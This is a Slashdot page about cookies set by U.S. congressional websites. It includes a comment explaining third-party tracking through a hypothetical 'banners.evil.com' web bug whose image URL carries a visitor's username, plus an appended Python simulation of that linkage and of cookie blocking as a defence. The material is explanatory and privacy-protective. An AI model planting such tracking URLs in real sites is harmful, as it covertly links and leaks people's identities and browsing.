Slashdot Mirror


More Cookie Investigations

FancyKetchup writes "This time, C|Net is caught up in cookie paranoia with their 'special investigation' into use of cookies on the Senate and House representative websites." From the article: "Sen. John McCain, R-Ariz., for instance, has been a longtime advocate of strict privacy laws to restrict commercial Web sites' data collection practices. In a statement posted on his own Web site, McCain assures visitors that 'I do not use 'cookies' or other means on my Web site to track your visit in any way.' But visiting mccain.senate.gov implants a cookie on the visitor's PC that will not expire until 2035." Follow-up to a story we reported on earlier.

1 of 201 comments

  1. Re:I can't quite make sense of this. by Mr. Slippery · Score: 3, Interesting
    The cookie gives the site access to information which it created in the first place, not any of your personal data.

    The trick is that the cookie can be linked to your personal information.

    The classic "compromising cookie" scenario involves a cookie set by an embedded image from a different server.

    Say that Evil, Inc runs a banner server banners.evil.com, which puts ads on kinky.xxx and on yourchurch.org (or maybe just an invisible "web bug" on either site). When you visit kinky.xxx, your browser requests the banner from banners.evil.com, which sets a cookie saying "I went to kinky.xxx and all I got was this lousy cookie". That cookie will be sent along with any request your browser makes to banners.evil.com.

    Then you log in to yourchurch.org. Their home page has an image tag with a source like "http://banners.evil.com/spyonme.php?username=your name". Your browser makes this request to banners.evil.com, sending along the cookie that server set earlier. Your browser thus tells Evil, Inc your yourchurch.org username (in the image URL) and the fact that you visited kinky.xxx (in the cookie).

    Evil, Inc phones up your pastor and lets him know so that he can shame you in front of the parish the next Sunday (turns out this is all part of your church's anti-porn crusade).

    --
    Tom Swiss | the infamous tms | my blog
    You cannot wash away blood with blood
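The linkage the comment above describes can be replayed with a small model: a per-host cookie jar standing in for the browser, and a server standing in for banners.evil.com that is embedded on two unrelated sites. This is an added example, not code from the page or from any of the sites named; the host names, the `spyonme.php?username=` URL and the two visits are taken from the comment, the username `tom`, the opaque cookie id and the `block_third_party` switch are constructed for illustration. The switch models the usual defence, refusing to store or send cookies for a host that differs from the page being viewed, so the same scenario can be run with and without it.

```python
"""Model of the third-party cookie linkage described in the comment above.

Constructed example: an in-process "browser" with a per-host cookie jar and a
tracker server embedded (as a banner or web bug) on two unrelated sites.
"""
import secrets
from urllib.parse import parse_qs, urlparse

TRACKER_HOST = "banners.evil.com"  # host name taken from the comment's scenario


class TrackerServer:
    """What banners.evil.com sees. profiles: cookie id -> list of observations."""

    def __init__(self):
        self.profiles = {}

    def handle(self, request_url, cookie, embedding_page):
        """Serve one banner/bug request; return a Set-Cookie value or None."""
        set_cookie = None
        if cookie is None:
            cookie = secrets.token_hex(8)   # fresh identifier for an unknown visitor
            set_cookie = cookie
        obs = self.profiles.setdefault(cookie, [])
        # the page that embedded the banner is learned from the Referer header
        obs.append(("visited", urlparse(embedding_page).hostname))
        # anything the embedding site put in the image URL (here: the username)
        for name, values in parse_qs(urlparse(request_url).query).items():
            obs.append((name, values[0]))
        return set_cookie


class Browser:
    """Per-host cookie jar; optional third-party cookie blocking (the mitigation)."""

    def __init__(self, block_third_party=False):
        self.block_third_party = block_third_party
        self.jar = {}  # host -> cookie value

    def load_page(self, page_url, embedded_urls, tracker):
        page_host = urlparse(page_url).hostname
        for url in embedded_urls:
            host = urlparse(url).hostname
            if host != TRACKER_HOST:
                continue  # only the tracker's resources matter for this model
            third_party = host != page_host
            suppress = third_party and self.block_third_party
            cookie = None if suppress else self.jar.get(host)
            new_cookie = tracker.handle(url, cookie, page_url)
            if new_cookie is not None and not suppress:
                self.jar[host] = new_cookie


def run_scenario(block_third_party):
    """Replay the comment's story; return the tracker's profiles."""
    tracker = TrackerServer()
    browser = Browser(block_third_party)
    # Visit 1: kinky.xxx embeds a banner served by the tracker.
    browser.load_page("http://kinky.xxx/", ["http://banners.evil.com/banner.gif"], tracker)
    # Visit 2: yourchurch.org embeds a web bug whose URL carries the logged-in username.
    browser.load_page(
        "http://yourchurch.org/home",
        ["http://banners.evil.com/spyonme.php?username=tom"],
        tracker,
    )
    return tracker.profiles


def linked_usernames(profiles):
    """Usernames the tracker can tie to a visit to some *other* site."""
    linked = {}
    for obs in profiles.values():
        names = [v for k, v in obs if k == "username"]
        sites = {v for k, v in obs if k == "visited"}
        for name in names:
            linked[name] = sorted(sites - {"yourchurch.org"})
    return linked


if __name__ == "__main__":
    for block in (False, True):
        print("block_third_party =", block, "->", linked_usernames(run_scenario(block)))
```

Without blocking, both visits land in one profile and the tracker can pair the username with the earlier site. With blocking, each visit gets a fresh, unstored identifier, so the two observations cannot be joined. Note what blocking does not fix: the username still reaches the tracker once, because the embedding site put it in the image URL; that leak is the embedding site's to close, and today's browsers narrow the cookie side of it further with the `SameSite` cookie attribute.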